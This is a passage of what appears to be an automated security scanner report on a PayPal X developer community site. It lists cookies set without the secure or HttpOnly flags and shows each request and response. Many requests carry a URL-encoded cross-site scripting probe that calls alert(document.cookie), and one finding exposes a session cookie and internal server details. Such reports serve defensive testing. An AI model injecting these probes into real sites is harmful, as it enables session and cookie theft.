Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 31756
JP: D=476 t=1317142478620420
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

/*********************************************/
/*            PayPal X Theme 1.0.17         */
/*********************************************/

/* @really general */
* {
-moz-border-radius: 0 !important
...[SNIP]...

2.15. https://appreview.x.com/themes/paypal/images/en/paypal_x_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/images/en/paypal_x_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/images/en/paypal_x_logo.gif HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/gif
Content-Length: 4783
JP: D=457 t=1317142478764665
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

GIF87a
.......(h.0p.3p.5s.7u.5o.9q.6p.;t.<y.=v.=|.Ax.B..?y.C{.D|.E}.E..F~.H.G.I..K.
J|.I..M..N..N..K..P..Q..N..T..S..P..S..V..W..S..X..Y..W..S..Z..[..\..\..Y..^..`..[.'Y.._..d..`..e.(\..b..e. `..g..
...[SNIP]...

2.16. https://appreview.x.com/themes/paypal/images/favicon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/images/favicon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/images/favicon.png HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/png
Content-Length: 967
JP: D=394 t=1317142477511031
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.PNG
.
...IHDR... ... .....szz.....sRGB.........bKGD.............    pHYs.................tIME......*...(...GIDATX.....\E....n?.ibf....... ..8..`....B.!..P...L..4F.......w
.p.&.... .....43}.UU.E]g....
...[SNIP]...

2.17. https://appreview.x.com/wro/g3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /wro/g3.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wro/g3.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:36 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 22 Sep 2011 23:12:12 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 291440
JP: D=476 t=1317142477259861
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

.calendar .nav{background:url("../menuarrow.gif") no-repeat 100% 100%;}.calendar tfoot .ttip .error{color:#c20;}.calendar tfoot tr.time td{padding:0;border-top:1px solid;}.calendar tfoot tr.time td.ti
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 17 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. https://appreview.x.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://appreview.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 27 Sep 2011 16:53:00 GMT
Server: Apache-Coyote/1.1
Location: https://appreview.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; Path=/
Set-Cookie: jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=2020 t=1317142380491666
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/


3.2. https://appreview.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Thu, 27-Oct-2011 16:53:25 GMT; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=94032 t=1317142405217205
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.3. https://appreview.x.com/images/transparent.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /images/transparent.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/transparent.png HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/png
Content-Length: 100
JP: D=727 t=1317142478816287
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.PNG
.
...IHDR.............(.4.....PLTE.......g......tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

3.4. https://appreview.x.com/plugins/app-type-plugin/styles/app.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/app-type-plugin/styles/app.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/app-type-plugin/styles/app.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 16107
JP: D=796 t=1317142477281324
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.jive-icon-app-sml {
background-image: url( ../images/app-12x12.gif);
background-position: 0 0;
}

.jive-icon-app-med {
background-image: url( ../images/app-16x16.gif);
background-posi
...[SNIP]...

3.5. https://appreview.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/borderless-widget-plugin/classes/borderless-widget.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/borderless-widget-plugin/classes/borderless-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 488
JP: D=529 t=1317142478497531
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.6. https://appreview.x.com/plugins/content-widgets/classes/community-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/content-widgets/classes/community-widget.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/content-widgets/classes/community-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 1257
JP: D=771 t=1317142477256194
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.7. https://appreview.x.com/plugins/digg-style-voting/scripts/plugin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/digg-style-voting/scripts/plugin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/digg-style-voting/scripts/plugin.js HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:36 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 4235
JP: D=552 t=1317142477243463
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/engine.js" ></script>');
document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/interface/Clearv
...[SNIP]...

3.8. https://appreview.x.com/plugins/digg-style-voting/styles/plugin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/digg-style-voting/styles/plugin.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/digg-style-voting/styles/plugin.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 4524
JP: D=387 t=1317142477561867
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

.clearvote-container {
padding: 0;
overflow: hidden;
display: block;
float: right;
}

.clearvote-container .clearvote-table {
   border:0;
   border-collapse:collapse;
   float:non
...[SNIP]...

3.9. https://appreview.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/i18n-html-widget-plugin/classes/borderless-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 488
JP: D=776 t=1317142478577944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.10. https://appreview.x.com/plugins/idea-type-plugin/resources/styles/idea.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/idea-type-plugin/resources/styles/idea.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/idea-type-plugin/resources/styles/idea.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 13894
JP: D=482 t=1317142477524567
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

body .jive-icon-idea-sml,
body .jive-icon-idea-med,
body .jive-icon-idea-big,
.voted-up .voted-arrow,
.voted-down .voted-arrow,
.vote-button {
   background-image: url(../images/j-ideas-sprites.png);
   _
...[SNIP]...

3.11. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=420 t=1317142478735923
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

3.12. https://appreview.x.com/styles/jive-community.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /styles/jive-community.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/jive-community.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 37406
JP: D=646 t=1317142478576093
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

3.13. https://appreview.x.com/styles/jive-videomodule.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/jive-videomodule.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 30950
JP: D=630 t=1317142478624226
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

3.14. https://appreview.x.com/themes/paypal/css/custom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/css/custom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/css/custom.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 31756
JP: D=476 t=1317142478620420
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

/*********************************************/
/*            PayPal X Theme 1.0.17         */
/*********************************************/

/* @really general */
* {
-moz-border-radius: 0 !important
...[SNIP]...

3.15. https://appreview.x.com/themes/paypal/images/en/paypal_x_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/images/en/paypal_x_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/images/en/paypal_x_logo.gif HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/gif
Content-Length: 4783
JP: D=457 t=1317142478764665
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

GIF87a
.......(h.0p.3p.5s.7u.5o.9q.6p.;t.<y.=v.=|.Ax.B..?y.C{.D|.E}.E..F~.H.G.I..K.
J|.I..M..N..N..K..P..Q..N..T..S..P..S..V..W..S..X..Y..W..S..Z..[..\..\..Y..^..`..[.'Y.._..d..`..e.(\..b..e. `..g..
...[SNIP]...

3.16. https://appreview.x.com/themes/paypal/images/favicon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/images/favicon.png

Issue detail

